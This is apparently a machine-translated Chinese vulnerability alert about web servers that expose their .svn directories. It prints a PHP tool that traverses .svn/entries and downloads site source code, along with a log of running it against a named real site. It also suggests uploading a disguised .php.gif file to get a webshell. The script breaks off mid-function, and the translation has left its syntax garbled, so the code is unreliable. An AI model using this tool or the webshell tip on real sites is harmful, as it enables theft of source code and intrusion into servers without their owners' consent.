佚名MYHACK58:62201233461. the svn directory does not have permissions to restrict the use of loopholes in the summary(including the repair program)-vulnerability warning-the black bar safety net
The existing site use. svn to do a production environment version control, however. the svn directory does not have to do the access restrictions, you can through the. svn/entries to traverse the file and directory list. In order to save energy, I wrote a php script(http://rains.im/?q=node/18)to do this thing, if*. php. svn-base is not when. php to perform, then congratulations, svn in. php program source code with you, analyze the source code may be able to help you find more vulnerabilities. If the. php. svn-base is treated as a php file to execute, you may see a php Error message(see the real path)or the content is blank, then, the same congratulations to you, this site has extension identify the problem, find a place to upload xxx. php. gif maybe you can directly get webshell.
Vulnerability to prove:/usr/local/bin/svn_clone-cvvvu http://www.2.newsmth.net
*** 下载 bbspsttmpl.php file
写 入 bbspsttmpl.php to/data/src/www. 2. newsmth. net (4 1 9 0 bytes)
*** Download the default-sf. css file
Write default-sf. css to/data/src/www. 2. newsmth. net (9 7 0 0 bytes)
*** 下载 www2-admin.php file
写 入 www2-admin.php to/data/src/www. 2. newsmth. net (1 8 1 9 bytes)
*** 下载 bbspst.php file
写 入 bbspst.php to/data/src/www. 2. newsmth. net (2 7 1 6 bytes)
#!/ usr/bin/php-q
<? php
/**
-
This script is used to download. the svn directory is not for restricted access and the svn version is less than 1. 7 website source code.
-
Please use php5. 3+to run this script. Want to support lower version,please modify the source code. Don’t have to notify me.
-
Author: drizzle@the clouds
-
http:// 蛋疼 .com
*/
#Error reporting level,only report errors
error_reporting(E_ERROR);
#To display the error
ini_set(‘display_errors’,‘On’);
define(‘VERSION’, ‘1.0’);
ini_set(‘user_agent’,‘svn_clone(svn_clone v’. VERSION.‘; by 小雨 @ 乌云 email:[email protected]; http:// 蛋疼 .com)’);
#Cache directory, the best placed in tmpfs, I didn’t do the cache period set,so want to really re-caught once and you have to manually delete the cache directory
define(‘CACHE_DIR’, ‘/tmp/cache’);
#Code to be saved to the path, except the domain name will automatically sub-directory to store the
define(‘DATA_DIR’, ‘/data/src’);
#Debug information level
define(‘NONE’, 0);#unconditional report
define(‘ERROR’, 1);#Error
define(‘WARNING’, 2);#warning
define(‘ALL’, 3);#All
define(‘EGGACHE’, 4);#balls
#Get the parameters
$opts = getopt(‘u:chv’,array(‘url:’,‘color’,‘help’,‘verbose’));
#Get the incoming URL address
$url = $opts[‘url’]?: ($opts[‘u’]?: null);
#Whether to display the help
$help = isset($opts[‘h’])+isset($opts[‘help’]);
#Whether to use color
define(‘USECOLOR’, isset($opts[‘c’])+isset($opts[‘color’]));
#Debug information level,v more in detail,accept up to 3 v, within the function, too lazy to write global,defined as constants.
define(‘VERBOSE’, count($opts[‘v’])+count($opts[‘verbose’]));
#The app name,Well, I don’t know if this wording is compatible with the other shell. Anyway bash with it the judge is right
$cmd = basename($SERVER[''])==‘php’?'php ‘.$ _SERVER[‘PHP_SELF’]:$SERVER['’];
if($help or !$ url) {
die(“Usage:\t$cmd option [url]\n”.
“\t-u --url\turl\t you want to by svn clone site url\n”.
“\t-c --color\t\t use the console for color output\n”.
“\t-v --verbose\t\t print more detailed information,v more detailed\n”.
“\t-h --help\t\t this help Information\n”.
“Examples:\n”.
“\t$cmd-u http://localhost\n”.
“\t$cmd-u http://localhost -cvv\n”.
“\t$cmd-vu http://localhost\n”.
“\t$cmd-cvvu http://localhost\n”.
“\t$cmd --url http://localhost --color --verbose --verbose --verbose someone is diligent to use this format?! Orz.\ n”
);
}
#I’m sick to my stomach…to write this line?..
debug(“balls is a disease,be calm,don’t ass…\n”, EGGACHE);
svn_clone($url);
#This program’s main function
function svn_clone($url) {
#Remove extra url to the end of the extra slash
$url=trim($url,‘/’);
$entries_url = $url.‘/. svn/entries’;
$content = get($entries_url);
if(!$ content) {
return debug(“$url is not a valid svn working copy!\ n”, ERROR);
} elseif(strlen($content)<1 0) {
return debug(“something too short,need little blue pills?\ n”, ERROR);
}
#Match the entries in the file and directory names
preg_match_all(‘/\f\n([^\n]+?)\ s(\w+)\s/s’, $content, $m) or debug(“$entries_url does not contain files or subdirectories\n”, WARNING);
$files = vast($m[1], $m[2]);
foreach($files as $file=>$type) {
if($type==‘dir’) {
debug(“>>> into the$file is a directory\n”, ALL);